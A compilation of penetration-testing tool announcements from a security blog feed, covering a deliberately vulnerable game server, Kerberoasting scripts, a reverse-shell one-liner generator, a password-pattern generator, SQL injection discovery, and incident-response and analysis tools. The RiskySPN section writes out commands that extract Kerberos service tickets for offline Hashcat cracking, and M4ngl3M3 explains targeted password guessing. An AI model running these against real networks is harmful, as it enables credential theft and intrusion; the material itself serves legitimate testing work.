PwnAdventure3 – Game Open-World MMORPG Intentionally Vulnerable To Hacks

Pwnie Island is a limited-release, first-person, true open-world MMORPG set on a beautiful island where anything could happen. That’s because this game is intentionally vulnerable to all kinds of silly hacks! Flying, endless cash, and more are all one client change or network proxy away. Are you ready for the mayhem?Official Site: http://www.pwnadventure.com/YouTube SeriesThis setup is part of a video series covering the different hacks and challenges in this game.Let’s Play/Hack – Pwn Adventure 3: Pwnie Island – part 1Setup Private Server with Docker – Pwn Adventure 3: part 2Information Gathering / Recon – Pwn Adventure 3: part 3Recover Game Classes with gdb – Pwn Adventure 3: part 4Hooking on Linux with LD_PRELOAD – Pwn Adventure 3: part 5Flying and our first Flag! (Cow King) – Pwn Adventure 3: part 6Teleporting and Hovering (Unbearable Revenge) – Pwn Adventure 3: part 7Install ServerRequirementsFrom the official README:At least 2GB of RAM, more RAM will allow more instances to be run on a single machine The Game Server does not need any graphics hardware and runs purely on console. It is known to run well on Amazon AWS and Digital Ocean VPS instances. The Game Server requires a lot of RAM to run, but uses fork and copy-on-write memory to allow many instances to run on a single host. For a server with 2GB of RAM, it is not recommended to run more than 5 instances, but a server with 8GB of RAM can typically run as many as the CPU can handle. It is recommended to use 2-3 instances per CPU core if you have sufficient RAM. You may be able to run 4-5 instances per core, but doing so may introduce slight lag. The files for the client and server are over 2GB as well, so several GB of free disk space are required. There are several ways to build and deploy your own server.Option 1 – OriginalOne option is to download and follow the instructions included in the README of the official files. The download can be found on the official website here http://www.pwnadventure.com/#server.Option 2 – Guide@Beaujeant created an excellent, and easy to follow step-by-step guide. It was also the basis for building the docker image from Option 3. The guide can be found here: https://github.com/beaujeant/PwnAdventure3/blob/master/INSTALL-server.md.Option 3 – DockerThis option is super easy, as long as docker and docker-compose are installed on a host. It makes it easy to run and tear down a server, without making changes to the actual host system.First, gather all necessary files:git clone https://github.com/LiveOverflow/PwnAdventure3.gitcd PwnAdventure3wget http://pwnadventure.com/pwn3.tar.gztar -xvf pwn3.tar.gzIn order to run the server, docker and docker-compose have to be installed. Docker is moving fast, so it’s a good idea to follow the current official steps for installation (which could also include to remove an older system version of docker):Docker CE Ubuntu: https://docs.docker.com/install/linux/docker-ce/ubuntu/.docker-compose: https://docs.docker.com/compose/install/make sure the current user is part of the docker group with: sudo usermod -a -G docker $USER. restart or re-login and verify with id that the user is part of the docker group.Then simply build the image and launch the master and game server:docker-compose builddocker-compose updocker-compose up can also run in detached/background mode with -d.Install ClientFirst download the client from the official website here: http://www.pwnadventure.com/#downloadsTo get a client connected to the new server, the server.ini for the client has to be modified. The server launched with docker expects that hostnames master.pwn3 and game.pwn3 are being used (These could theoretically be changed in the docker/setup files).The server.ini for the client has to look something like this:[MasterServer]Hostname=master.pwn3Port=3333[GameServer]Hostname=game.pwn3Port=3000Username=Password=Instances=Make sure that the client can reach these hosts, for example by adding them to the /etc/hosts file. In this example the server is running on 192.168.178.57 and the entry for them would be:192.168.178.57 master.pwn3192.168.178.57 game.pwn3Warning: Using an IP as Hostname in the server.ini does not work! I spent 2 hours trying to figure out what was wrong.To stop the server, simply type docker-compose down.Warning: The database file is not persistent – taking down the container resets everything. So backup first.TroubleshootingError: docker-compose build$ docker-compose buildBuilding initERROR: Error processing tar file(exit status 1): write /client/PwnAdventure3_Data/PwnAdventure3/PwnAdventure3/Content/Paks/Characters.pak: no space left on deviceA: Get more disk space.$ docker-compose buildBuilding initERROR: Couldn’t connect to Docker daemon at http+docker://localunixsocket – is it running?A: Your user is probably not part of the docker group or docker service not running. sudo usermod -a -G docker pwn3, verify with id. Or service docker restart.File IntegrityCheck if the archive is corrupted$ md5sum pwn3.tar.gzd3f296461fa57996018ce0e4e5a653ee pwn3.tar.gz$ sha1sum pwn3.tar.gz022bd5174286fd78cd113bc6da6d37ae9af1ae8e pwn3.tar.gzPwnAdventure3 Client ErrorsConnection Error: Unable to connect to master serverThis probably means that the MasterServer is not reachable.Client issues:Check the [MasterServer] entry in the client’s server.iniCan you ping master.pwn3 from the host from your system?Is the IP correct in the /etc/hosts file?Server issues:Is the server not running and listening on port 3333?Check with sudo netstat -tulpn Is the master server listening: tcp6 0 0 :::3333 :::* LISTEN 31913/docker-proxyCheck docker ps if the two containers are upmaster server running? 880f93374070 pwn3server “/opt/pwn3/setup/mas…" 0.0.0.0:3333->3333/tcp, 5432/tcp pwnadventure3_master_1Waiting in connection queue…This means the MasterServer is reachable and is waiting now for a free GameServer that can be given to the client. This probably means that no GameServer is running, or was not able to connect to the MasterServer.Server issues:Is a game server running and listening on port 3000-3005?Check listening processes with sudo netstat -tulpntcp6 0 0 :::3000 :::* LISTEN 32160/docker-proxyIs pwnadventure3_game_1 container running? Check with docker ps -a 84343f81034f pwn3server "/opt/pwn3/setup/gam…" 0.0.0.0:3000-3010->3000-3010/tcp, 5432/tcp pwnadventure3_game_1do you see the following line in the log from docker-compose up: line 1: 7 Killed ./PwnAdventure3Server; pwnadventure3_game_1 exited with code 137 GET MORE RAM!Docker versionsThese versions were used during testing as a host:$ uname -aLinux ubuntu 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:07:32 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux$ docker-compose versiondocker-compose version 1.19.0, build 9e633efdocker-py version: 2.7.0CPython version: 2.7.13OpenSSL version: OpenSSL 1.0.1t 3 May 2016$ docker –versionDocker version 17.12.1-ce, build 7390fc6ScreenshotsDownload PwnAdventure3

Link: http://feedproxy.google.com/~r/PentestTools/~3/1enkfDCYNho/pwnadventure3-game-open-world-mmorpg.html

RiskySPN – Detect And Abuse Risky SPNs

RiskySPNs is a collection of PowerShell scripts focused on detecting and abusing accounts associated with SPNs (Service Principal Name). This module can assist blue teams to identify potentially risky SPNs as well as red teams to escalate privileges by leveraging Kerberos and Active Directory.For detailed information: http://www.cyberark.com/blog/service-accounts-weakest-link-chain/UsageInstall the moduleImport-Module .\RiskySPNs.psm1Or just load the script (you can also IEX from web). .\Find-PotentiallyCrackableAccounts.ps1Make sure Set-ExecutionPolicy is Unrestricted or BypassGet information about a function (very detailed :))Get-Help Get-TGSCipher -FullAll fucntions also have -Verbose modeSearch vulnerable SPNsFind vulnerable accountsFind-PotentiallyCrackableAccountsSensitive + RC4 = $$$Generate full deatiled report about vulnerable accounts (CISO <3)Export-PotentiallyCrackableAccountsGet ticketsRequest Kerberos TGS for SPNGet-TGSCipher -SPN "MSSQLSvc/prodDB.company.com:1433"OrFind-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipherThe fun stuff :)Find-PotentiallyCrackableAccounts -Sensitive -Stealth -GetSPNs | Get-TGSCipher -Format "Hashcat" | Out-File crack.txtoclHashcat64.exe -m 13100 crack.txt -a 3Download RiskySPN

Link: http://feedproxy.google.com/~r/PentestTools/~3/Zc66zkwABNE/riskyspn-detect-and-abuse-risky-spns.html

One-Lin3r v1.1 – Gives You One-Liners That Aids In Penetration Testing Operations

One-Lin3r is simple and light-weight framework inspired by the web-delivery module in Metasploit.It consists of various one-liners that aids in penetration testing operations:Reverser: Give it IP & port and it returns a reverse shell liner ready for copy & paste.Dropper: Give it an uploaded-backdoor URL and it returns a download-&-execute liner ready for copy & paste.Other: Holds liners with the general purpose to help in penetration testing (ex: Mimikatz, Powerup, etc…) on the trending OSes (Windows, Linux, and macOS) “More OSes can be added too".FeaturesSearch for any one-liner in the database by its full name or partially.You can add your own liners by following these steps to create a ".liner" file. Also, you can send it to me directly and it will be added in the framework and credited with your name .Autocomplete any framework command and recommendations in case of typos (in case you love hacking like movies ).Command line arguments can be used to give the framework a resource file to load and execute for automation.The ability to reload the database if you added any liner without restarting the framework.You can add any platform to the payloads database just by making a folder in payloads folder and creating a ".liner" file there.More…The payloads database is not big now because this the first edition but it will get bigger with updates and contributions.ScreenshotsUsageCommandline argumentsusage: one-lin3r [-h] [-r R] [-x X] [-q]optional arguments: -h, –help show this help message and exit -r Execute a resource file (history file). -x Execute a specific command (use ; for multiples). -q Quit mode (no banner).Framework commandsCommand Description——– ————-help/? Show this help menulist/show List payloads you can use in the attack.search Search payloads for a specific oneuse <payload> Use an available payloadinfo <payload> Get information about an available payloadbanner Display bannerreload/refresh Reload the payloads databasecheck Prints the core version and database version then check for them online.history Display command line most important history from the beginningsave_history Save command line history to a fileexit/quit Exit the frameworkInstalling and requirementsTo make the tool work at its best you must have :Python 3.x or 2.x (preferred 3).Linux (Tested on kali rolling), Windows system, mac osx (tested on 10.11)The requirements mentioned in the next few lines.Installing+For windows : (After downloading ZIP and upzip it)python -m pip install ./One-Lin3r-masterone-lin3r -h+For Linux :git clone https://github.com/D4Vinci/One-Lin3r.gitapt-get install libncurses5-devpip install ./One-Lin3rone-lin3r -hUpdating the framework or the databaseOn Linux while outside the directorycd One-Lin3r && git pull && cd ..pip install ./One-Lin3r –upgradeOn Windows if you don’t have git installed, redownload the framework zipped!Download One-Lin3r

Link: http://feedproxy.google.com/~r/PentestTools/~3/elxDfxPSrg8/one-lin3r-v11-gives-you-one-liners-that.html

M4Ngl3M3 – Common Password Pattern Generator Using Strings List

Common password pattern generator using strings list.Quick Installation:$ git clone https://github.com/localh0t/m4ngl3m3$ cd m4ngl3m3$ ./main.pyBasic Help:usage: main.py [-h] [-fy FROM_YEAR] [-ty TO_YEAR] [-sy] [-nf NUMBERS_FILE] [-sf SYMBOLS_FILE] [-cf CUSTOM_FILE] [-sbs] [-sap] [-mm MUTATION_METHODS] MUTATION_MODE STRINGS_FILE OUTPUT_FILECommon password pattern generator using strings listpositional arguments: MUTATION_MODE Mutation mode to perform: (prefix-mode | suffix-mode | dual-mode) STRINGS_FILE File with strings to mutate OUTPUT_FILE Where to write the mutated stringsoptional arguments: -h, –help show this help message and exit -fy FROM_YEAR, –from-year FROM_YEAR Year where our iteration starts (default: 2015) -ty TO_YEAR, –to-year TO_YEAR Year where our iteration ends (default: 2020) -sy, –short-year Also add shorter year form when iterating (default: False) -nf NUMBERS_FILE, –numbers-file NUMBERS_FILE Numbers prefix/suffix file (default: ./files/numbers/numbers_set2.txt) -sf SYMBOLS_FILE, –symbols-file SYMBOLS_FILE Symbols prefix/suffix file (default: ./files/symbols/symbols_set2.txt) -cf CUSTOM_FILE, –custom-file CUSTOM_FILE Custom words/dates/initials/etc file (default: None) -sbs, –symbols-before-suffix Insert symbols also before years/numbers/ custom (when in suffix-mode or dual-mode) (default: False) -sap, –symbols-after-prefix Insert symbols also after years/numbers/ custom (when in prefix-mode or dual-mode) (default: False) -mm MUTATION_METHODS, –mutation-methods MUTATION_METHODS Mutation methods to perform (comma separated, no spaces) (valid: see MUTATION_METHODS.md) (default: normal,uppercase,firstup,replacevowels)–from-year (-fy), –to-year (-ty):Here we set where we want our script to start and end iterating over years. Many times people include the current year in an effort to add some entropy. Because passwords could be outdated, or the years included could be in the (near) future, we are going to add them as a range. For online environments, we would be looking at a conservative approach and only include ranges in the order of (-1, +1) or (-2, +2). For offline environments, the range could be wider to (-20, +5) or even (-50, +10). Output example:password2017[…]password2018[…]password2019–short-year (-sy):When iterating years, also add its shorter double digit form. Output example:password17[…]password18[…]password19–numbers-file (-nf):In this argument we are going to select a file containing numbers that people frequently add to their passwords. By default I included 6 sets, the largest being the 6, and the rest being subsets of the previous one. The numbers included in the first sets (1,2…) are more likely to be present that the ones only included in latest sets (…5,6). Again, for online environments, we would be looking at using the first three sets, where in offline environments, we could use the last ones. By default, the script uses the set number 2. Output example:password1[…]password123[…]password1234–symbols-file (-sf):In this argument we are going to select a file containing symbols that people frequently add to their passwords. Again, set number 1 is the shortest, set number 6 is the largest. The symbols included in the first sets (1,2…) are more likely to be present that the ones only included in latest sets (…5,6). By default, the script uses the set number 2. Output example:password123![…]password2018?[…]password1234.–custom-file (-cf):Here we add anything else we know about our targets (and it’s not considered as the “base” of the password itself). Let the creativity roll in! It could be from company initials, birth dates, special dates… to specific years, short keywords, etc. This custom strings will be treated in the same way that the years/numbers. Output example:passwordABC[…]password01011980![…]password.adminMUTATION_MODE (positional argument):In this parameter we are going to select how the tool will work when shifting strings. You can choose one of three:suffix-mode: It will add years, numbers, symbols and custom after the main string. Example: password2018!prefix-mode: It will add years, numbers, symbols and custom before the main string. Example: !2018passworddual-mode: As the name suggests, it uses both modes (generates both outputs).STRINGS_FILE (positional argument):File containing strings to mutate. If you’re for example, doing a pentest and don’t know where to start, I would suggest you using a tool like CeWL to spider the company website, and keep the most recurring words (including the company name of course).OUTPUT_FILE (positional argument):Simply, file where we want to write the mutated strings.–symbols-before-suffix (-sbs):When this flag is enabled, and we are running the tool either in suffix-mode or dual-mode, the script will also add the symbols before years/numbers/custom. Output example:password2018![…]password!2018[…]–symbols-after-prefix (-sap):When this flag is enabled, and we are running the tool either in prefix-mode or dual-mode, the script will also add the symbols after years/numbers/custom. Output example:!2018password[…]2018!password[…]–mutation-methods (-mm):In this parameter we define which mutation methods are going to be performed. Mutation methods are base transformations made before starting iterating over years/numbers/symbols/custom. You can select as many mutation methods as you want. For a list of all valid mutation methods, check: MUTATION_METHODS.md.By default, m4ngl3m3! runs with the following: Normal, UpperCase, FirstUp and ReplaceVowels.Usage examples:Usage example (1):$ ./main.py –from-year 2017 –to-year 2018 –symbols-before-suffix suffix-mode strings.txt output.txt(or, shorter version)$ ./main.py -fy 2017 -ty 2018 -sbs suffix-mode strings.txt output.txt[!] Starting…[+] Normal-Mangling mutation method done on string: admin[+] UpperCase-Mangling mutation method done on string: admin[+] FirstUp-Mangling mutation method done on string: admin[+] ReplaceVowels-Mangling mutation method done on string: admin—[+] Normal-Mangling mutation method done on string: companyname[+] UpperCase-Mangling mutation method done on string: companyname[+] FirstUp-Mangling mutation method done on string: companyname[+] ReplaceVowels-Mangling mutation method done on string: companyname—[!] All done![!] Strings read: 2[!] Strings written: 888[!] Exiting …“Iterate from year 2017 to 2018, default numbers and symbols file, suffix mode only, insert symbols also before suffix, default mutation methods.”Input file:admincompanynameOutput file:adminadmin![…]Admin2017!Admin!2017[…]COMPANYNAME1234!COMPANYNAME!1234[…]c0mp4nyn4m32018@c0mp4nyn4m3@2018[…]Usage example (2):$ ./main.py -fy 2016 -ty 2019 -sy -nf ./files/numbers/numbers_set1.txt -sf ./files/symbols/symbols_set1.txt -sbs -sap -mm normal,firstup,doubleandfirstup,basicleet dual-mode strings.txt output.txt[!] Starting…[+] Normal-Mangling mutation method done on string: password[+] FirstUp-Mangling mutation method done on string: password[+] DoubleAndFirstUp-Mangling mutation method done on string: password[+] BasicLeet-Mangling mutation method done on string: password—[+] Normal-Mangling mutation method done on string: example[+] FirstUp-Mangling mutation method done on string: example[+] DoubleAndFirstUp-Mangling mutation method done on string: example[+] BasicLeet-Mangling mutation method done on string: example—[!] All done![!] Strings read: 2[!] Strings written: 1288[!] Exiting …“Iterate from year 2016 to 2019, with short year form also, use set 1 for numbers and symbols, dual-mode (prefix and suffix), insert symbols also before suffix, insert symbols also after prefix, mutation methods: Normal, FirstUp, DoubleAndFirstUp, BasicLeet.”Input file:passwordexampleOutput file:passwordpassword!password@[…]!2018PasswordPassword!18PasswordPassword2018!PasswordPassword18!PasswordPassword[…]p455w0rd$1p455w0rd123p455w0rd123!p455w0rd!123[…]Example!2019Example!19[…]Download M4Ngl3M3

Link: http://feedproxy.google.com/~r/PentestTools/~3/DLmcogzhpGU/m4ngl3m3-common-password-pattern.html

Rastrea2R – Collecting &Amp; Hunting For IOCs With Gusto And Style

Ever wanted to turn your AV console into an Incident Response & Threat Hunting machine? Rastrea2r (pronounced “rastreador" – hunter- in Spanish) is a multi-platform open source tool that allows incident responders and SOC analysts to triage suspect systems and hunt for Indicators of Compromise (IOCs) across thousands of endpoints in minutes. To parse and collect artifacts of interest from remote systems (including memory dumps), rastrea2r can execute sysinternal, system commands and other 3rd party tools across multiples endpoints, saving the output to a centralized share for automated or manual analysis. By using a client/server RESTful API, rastrea2r can also hunt for IOCs on disk and memory across multiple systems using YARA rules. As a command line tool, rastrea2r can be easily integrated within McAfee ePO, as well as other AV consoles and orchestration tools, allowing incident responders and SOC analysts to collect forensic evidence and hunt for IOCs without the need for an additional agent, with ‘gusto’ and style! DependenciesPython 2.7.xgitbottlerequestsyara-python QuickstartClone the project to your local directory (or download the zip file of the project)$git clone https://github.com/rastrea2r/rastrea2r.git$cd rastrea2rAll the dependencies necessary for the tool to run can be installed within a virtual environment via the provided makefile.$make helphelp – display this makefile’s help informationvenv – create a virtual environment for developmentclean – clean all files using .gitignore rulesscrub – clean all files, even untracked filestest – run teststest-verbose – run tests [verbosely]check-coverage – perform test coverage checkscheck-style – perform pep8 checkfix-style – perform check with autopep8 fixesdocs – generate project documentationcheck-docs – quick check docs consistencyserve-docs – serve project html documentationdist – create a wheel distribution packagedist-test – test a wheel distribution packagedist-upload – upload a wheel distribution packageCreate a virtual environment with all dependencies$make venv//Upon successful creation of the virtualenvironment, enter the virtualenvironment as instructed, for ex:$source /Users/ssbhat/.venvs/rastrea2r/bin/activateStart the rastrea2r server by going to $PROJECT_HOME/src/rastrea2r/server folder$cd src/rastrea2r/server/$python rastrea2r_server_v0.3.pyBottle v0.12.13 server starting up (using WSGIRefServer())…Listening on http://0.0.0.0:8080/Now execute the client program, depending on which platform you are trying to scan choose the target python script appropriately. Currently Windows, Linux and Mac platforms are supported.$python rastrea2r_osx_v0.3.py -husage: rastrea2r_osx_v0.3.py [-h] [-v] {yara-disk,yara-mem,triage} …Rastrea2r RESTful remote Yara/Triage tool for Incident Responderspositional arguments: {yara-disk,yara-mem,triage}modes of operation yara-disk Yara scan for file/directory objects on disk yara-mem Yara scan for running processes in memory triage Collect triage information from endpointoptional arguments: -h, –help show this help message and exit -v, –version show program’s version number and exitFurther more, the available options under each command can be viewed by executing the help option. i,e$python rastrea2r_osx_v0.3.py yara-disk -husage: rastrea2r_osx_v0.3.py yara-disk [-h] [-s] path server rulepositional arguments:path File or directory path to scanserver rastrea2r REST serverrule Yara rule on REST serveroptional arguments:-h, –help show this help message and exit-s, –silent Suppresses standard outputFor ex, on a Mac or Unix system you would do:$cd src/rastrea2r/osx/$python rastrea2r_osx_v0.3.py yara-disk /opt http://127.0.0.1:8080/ test.yar Executing rastrea2r on WindowsApart from the libraries specified in requirements.txt, we need to install the following libraries PSutil for win64: https://github.com/giampaolo/psutilWMI for win32: https://pypi.python.org/pypi/WMI/Requests: pip install requestsCompiling rastrea2rMake sure you have all the dependencies installed for the binary you are going to build on your Windows box. Then install:Pywin32: http://sourceforge.net/projects/pywin32/files/ ** Windows onlyPyinstaller: https://github.com/pyinstaller/pyinstaller/wiki Currently Supported functionalityyara-disk: Yara scan for file/directory objects on diskyara-mem: Yara scan for running processes in memorymemdump: Acquires a memory dump from the endpoint ** Windows onlytriage: Collects triage information from the endpoint ** Windows only NotesFor memdump and triage modules, SMB shares must be set up in this specific way:Binaries (sysinternals, batch files and others) must be located in a shared folder called TOOLS (read only) \path-to-share-foldertoolsOutput is sent to a shared folder called DATA (write only) \path-to-share-folderdataFor yara-mem and yara-disk scans, the yara rules must be in the same directory where the server is executed from. The RESTful API server stores data received in a file called results.txt in the same directory. Contributing to rastrea2r projectThe Developer Documentation provides complete information on how to contribute to rastrea2r project Demo videos on YoutubeVideo 1: Incident Response / Triage with rastrea2r on the command line – https://youtu.be/uFIZxqWeSyQVideo 2: Remote Yara scans with rastrea2r on the command line – https://youtu.be/cnY1yEslirwVideo 3: Using rastrea2r with McAfee ePO – Client Tasks & Execution – https://youtu.be/jB17uLtu45Y Presentationsrastrea2r at BlackHat Arsenal 2016 (check PDF for documentation on usage and examples) https://www.blackhat.com/us-16/arsenal.html#rastrea2rhttps://github.com/aboutsecurity/Talks-and-Presentations/blob/master/Ismael_Valenzuela-Hunting_for_IOCs_rastrea2r-BH_Arsenal_2016.pdf Recording of talk on rastrea2r at the SANS Threat Hunting Summit 2016https://www.youtube.com/watch?v=0PvBsL6KKfA&feature=youtu.be&a Credits & ReferencesTo Robert Gresham Jr. (@rwgresham) and Ryan O’Connor (@_remixed) for their contributions to the Triage module. Thanks folks!To Ricardo Dias for the idea of using a REST server and his great paper on how to use Python and Yara with McAfee ePO: http://www.sans.org/reading-room/whitepapers/forensics/intelligence-driven-incident-response-yara-35542Download Rastrea2R

Link: http://feedproxy.google.com/~r/PentestTools/~3/dD0nCbbILCw/rastrea2r-collecting-hunting-for-iocs.html

Namechk – Osint Tool Based On Namechk.Com For Checking Usernames On More Than 100 Websites, Forums And Social Networks

Osint tool based on namechk.com for checking usernames on more than 100 websites, forums and social networks.Use:Search available username: ./namechk.sh -au Search available username on specifics websites: ./namechk.sh <username> -au -co Search available username list: ./namechk.sh -l -au Search used username: ./namechk.sh <username> -fu Search used username on specifics websites: ./namechk.sh <username> -fu -co Search used username list: ./namechk.sh -l -fuTested websDownload Namechk

Link: http://feedproxy.google.com/~r/PentestTools/~3/0dqBiyI9YQU/namechk-osint-tool-based-on-namechkcom.html

SleuthQL – Burp History Parsing Tool To Discover Potential SQL Injection Points

SleuthQL is a python3 script to identify parameters and values that contain SQL-like syntax. Once identified, SleuthQL will then insert SQLMap identifiers (*) into each parameter where the SQL-esque variables were identified.Supported Request TypesSleuthQL requires an export of Burp’s Proxy History. To gain this export, simply navigate to your proxy history tab, highlight every item and click “Save Items". Ensure that each request is saved using base64 encoding. When SleuthQL scans the proxy history file, outside of the regular URL parameters, it will be able to identify vulnerable parameters from the following request content-types:application/jsonapplication/x-www-form-urlencodedmultipart/form-dataThere are cases where this tool will break down. Namely, if there is nested content-types (such as a base64 encoded parameter within JSON data), it will not be able to identify those parameters. It also does not cover Cookies, as too often something such as CloudFlare will flag a parameter we’re not interested in.Why not Burp Pro?Burp Pro’s scanner is great, but isn’t as full featured as SQLMap. Thus, if we can prioritize requests to feed into SQLMap in a batch-like manner and look for results this way, we can increase the detection rate of SQL injection.UsageUsage: .:/+ssyyyyyyso+/:. -/s s/. .+| SleuthQL |y+. -s| SQL Injection Discovery Tool |s- .shh| |ohs. +hhhho+shhhhhhhhhhhs/hhhhhhhhhhhhhhhh.-hh/ `shhhhhhy:./yo/:—:/:`hhhhhhhhhhhhhhhs“ohho shhhhhhhhh-`-//::+os: +hhhhhhhhh+shhhh.o-/hhho +hhhhhhhhh:+y/.:shy/ /hhhhhhhhh/`ohhh-/h-/hhhh/ .hhhhhhhhhsss`.yhhs` .shhhhhhhh+-o-hhh-/hh`ohhhhh`+hhhhhhhhhhhhyoshh+. `shhhhhs/-oh:ohs.ohh+`hhhhhh/shhhhhhhhhhhhhhhhhhh/ -//::+yhy:oy::yhhy`+hhhhhhoyhhhhhhhhhhhhhhhhhhh:-:. `+y+-/:/yhhhy.-hhhhhhhsshhhhhhhhhhhhhhhhhhh+ :/o+:.“ -hhhhhs`.hhhhhhhho+hhhhhhhs/hhhhhhhhhhy::/:/yhhhy: .+yy/ :hhhhhhhhh/.hhhhhhh:.hhhhhhhhhhhhhhhhhhhhhhs/- -shhhhhhhhhh` +hhhhhh+ /hhhhhhhhhhhhhhhhhhhhho/:`+hhhhhhhhhhh/ shhhhy+ -shhhhhhhhhhhhhhhhhhh.// yhhhhhhhhhho `ohh+://+/.`-/++ooooooooooyhhhhy.`hhhhhhhhhho /hhhhhhhhhso++//+++oooo+:`sh+`-yhhhhhhhhh/ .s s. -s Rhino Security Labs s- .+y Dwight Hohnstein y+. ./s s/. .:/+osyyyyyyso+/-. sleuthql.py -d example.com -f burpproxy.xmlSleuthQL is a script for automating the discovery of requests matchingSQL-like parameter names and values. When discovered, it will displayany matching parameters and paths that may be vulnerable to SQL injection.It will also create a directory with SQLMap ready request files.Options: -h, –help show this help message and exit -d DOMAINS, –domains=DOMAINS Comma separated list of domains to analyze. i.e.: google.com,mozilla.com,rhinosecuritylabs.com -f PROXY_XML, –xml=PROXY_XML Burp proxy history xml export to parse. Must be base64 encoded. -v, –verbose Show verbose errors that occur during parsing of the input XML.Output FilesFor each potentially vulnerable request, the SQLMap parameterized request will be saved under $(pwd)/$domain/ as text files.Video DemoDownload SleuthQL

Link: http://feedproxy.google.com/~r/PentestTools/~3/GQ5nGSUgmaI/sleuthql-burp-history-parsing-tool-to.html

DARKSURGEON – A Windows Packer Project To Empower Incident Response, Digital Forensics, Malware Analysis, And Network Defense

DARKSURGEON is a Windows packer project to empower incident response, digital forensics, malware analysis, and network defense.DARKSURGEON has three stated goals:Accelerate incident response, digital forensics, malware analysis, and network defense with a preconfigured Windows 10 environment complete with tools, scripts, and utilities. Provide a framework for defenders to customize and deploy their own programmatically-built Windows images using Packer and Vagrant.Reduce the amount of latent telemetry collection, minimize error reporting, and provide reasonable privacy and hardening standards for Windows 10.If you haven’t worked with packer before, this project has a simple premise:Provide all the tools you need to have a productive, secure, and private Windows virtual machine so you can spend less time tweaking your environment and more time fighting bad guys.Please note this is an alpha project and it will be subject to continual development, updates, and package breakage.Development PrinciplesDARKSURGEON is based on a few key development principles:Modularity is key. Each component of the installation and configuration process should be modular. This allows for individuals to tailor their packer image in the most flexible way.Builds must be atomic. A packer build should either complete all configuration and installation tasks without errors, or it should fail. A packer image with missing tools is a failure scenario.Hardened out of the box. To the extent that it will not interfere with investigative workflows, all settings related to proactive hardening and security controls should be enabled. Further information on DARKSURGEON security can be found later in this post. Instrumented out of the box. To the extent that it will not interfere with investigative workflows, Microsoft Sysmon, Windows Event Logging, and osquery will provide detailed telemetry on host behavior without further configuration.Private out of the box. To the extent that it will not interfere with investigative workflows, all settings related to privacy, Windows telemetry, and error reporting should minimize collection.HardeningDARKSURGEON is hardened out of the box, and comes with scripts to enable High or Low security modes.All default installations of DARKSURGEON have the following security features enabled:Windows Secure Boot is Enabled.Windows Event Log Auditing is Enabled. (Palantir Windows Event Forwarding Guidance)Windows Powershell Auditing is Enabled. (Palantir Windows Event Forwarding Guidance)Windows 10 Privacy and Telemetry are Reduced to Minimal Settings. (Microsoft Guidance)Sysinternals Sysmon is Installed and Configured. (SwiftonSecurity Public Ruleset)LLMNR is Disabled.NBT is Disabled.WPAD is Removed.Powershell v2 is Removed.SMB v1 is Removed.Application handlers for commonly-abused file extensions are changed to notepad.exe.Additionally, the user may specify a Low or High security mode by using the appropriate scripts. The default setting is to build an image in Low Security mode.Low Security mode is primarily used for virtual machines intended for reverse engineering, malware analysis, or systems that cannot support VBS security controls.In Low Security mode, the following hardening features are configured:Windows Defender Anti-Virus Real-Time Scanning is Disabled.Windows Defender SmartScreen is Disabled.Windows Defender Credential Guard is Disabled.Windows Defender Exploit Guard is Disabled.Windows Defender Exploit Guard Attack Surface Reduction (ASR) is Disabled.Windows Defender Application Guard is Disabled.Windows Defender Application Guard does not enforce isolation.Note: High Security mode is still in development.High Security mode is primarily used for production deployment of sensitive systems (e.g. Privileged Access Workstations) and may require additional tailoring or configuration.In High Security mode, the following hardening features are configured:Windows Defender Anti-Virus Real-Time Scanning is Enabled.Windows Defender SmartScreen is Enabled and applied to All Traffic.Windows Defender Credential Guard is Enabled.Windows Defender Exploit Guard is Enabled.Windows Defender Exploit Guard Attack Surface Reduction (ASR) is Enabled.Windows Defender Application Guard is Enabled.Windows Defender Application Guard enforces isolation.TelemetryWhether analyzing unknown binaries or working on sensitive projects, endpoint telemetry powers detection and response operations. DARKSURGEON comes pre-configured with the following telemetry sources available for analysis:Windows Event Log Auditing is enabled. (Palantir Windows Event Forwarding Guidance).Windows Powershell Auditing is enabled. (Palantir Windows Event Forwarding Guidance).Sysinternals Sysmon is installed and configured. (SwiftonSecurity Ruleset)PrivacyYour operational environment contains some of the most sensitive data from your network, and it’s important to safeguard that from prying eyes. DARKSURGEON implements the following strategies to maximize privacy without hindering workflows:Windows 10 telemetry settings are configured to minimize collection.Cortana, diagnostics, tracking, and other services are disabled.Windows Error Reporting (WER) is disabled.Windows Timeline, shared clipboard, device hand-off, and other synchronize-by-default applications are disabled or neutered. Microsoft Guidance for reducing telemetry and data collection has been implemented.PackagesOut of the box, DARKSURGEON comes equipped with tools, scripts, and binaries to make your life as a defender easier.Android Analysis:Tools, scripts, and binaries focused on android analysis and reverse engineering.APKTool (FLARE)Blue Team:Tools, scripts, and binaries focused on blue team, network defense, and alerting/detection development.ACEBloodhound / SharphoundCimSweepDumpsterfireEndGame Red Team Automation (RTA)KansaPosh-GitInvoke-ATTACKAPILOLBAS (Living Off the Land Binaries And Scripts)OSX CollectorPosh-SecModPosh-SysmonPowerForensicsPowerSploitPractical Malware Analysis Labs (FLARE)Revoke-ObfuscationYara (FLARE)Debuggers:Tools, scripts, and binaries for debugging binary artifacts.Ollydbg (FLARE)OllyDump (FLARE)OllyDumpEx (FLARE)Ollydbg2 (FLARE)OllyDump2Ex (FLARE)x64dbg (FLARE)Windbg (FLARE)Disassemblers:Tools, scripts, and binaries for disassembling binary artifacts.IDA Free Trial (FLARE)Binary Ninja Demo (FLARE)Radare2 (FLARE)Document Analysis: Tools, scripts, and binaries for performing analysis of documents.OffVis (FLARE)OfficeMalScanner (FLARE)PDFId (FLARE)PDFParser (FLARE)PDFStreamDumper (FLARE)DotNet Analysis:Tools, scripts, and binaries for performing analysis of DotNet artifacts.DE4Dot (FLARE)DNSpy (FLARE)DotPeek (FLARE)ILSpy (FLARE)Flash Analysis:Tools, scripts, and binaries for performing analysis of flash artifacts.FFDec (FLARE)Forensic Analysis:Tools, scripts, and binaries for performing forensic analysis on application and operating system artifacts.Amcache ParserAppCompatCache ParserIISGeolocateJLECmdLECmdJumpList ExplorerPECmdRegistry ExplorerRegshot (FLARE)Shellbags ExplorerTimeline ExplorerTSK (The Sleuthkit)VolatilityX-Ways Forensics Installer Manager (XWFIM)Hex Editors:FileInsight (FLARE)HxD (FLARE)010 Editor (FLARE)Java Analysis:JD-GUI (FLARE)Dex2JARNetwork Analysis:Burp FreeFakeNet-NG (FLARE)Wireshark 